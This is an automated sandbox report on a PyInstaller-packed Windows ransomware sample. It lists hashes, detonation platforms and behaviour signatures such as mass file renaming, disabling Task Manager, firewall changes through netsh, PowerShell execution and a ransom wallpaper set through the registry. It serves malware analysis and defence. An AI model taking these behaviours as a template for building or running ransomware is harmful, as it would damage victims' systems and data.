Malware Analysis Report

2025-06-15 20:56

Sample ID 240526-ahe6hagc69
Target a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c
SHA256 a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c
Tags
pyinstaller evasion execution ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c

Threat Level: Known bad

The file a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c was found to be: Known bad.

Malicious Activity Summary

pyinstaller evasion execution ransomware

Renames multiple (149) files with added filename extension

Disables Task Manager via registry modification

Blocklisted process makes network request

Modifies Windows Firewall

Checks computer location settings

Loads dropped DLL

Drops desktop.ini file(s)

Command and Scripting Interpreter: PowerShell

Sets desktop wallpaper using registry

Detects Pyinstaller

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 00:12

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 00:12

Reported

2024-05-26 00:15

Platform

win7-20240419-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe

"C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe"

C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe

"C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI20282\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-26 00:12

Reported

2024-05-26 00:15

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe"

Signatures

Renames multiple (149) files with added filename extension

ransomware

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
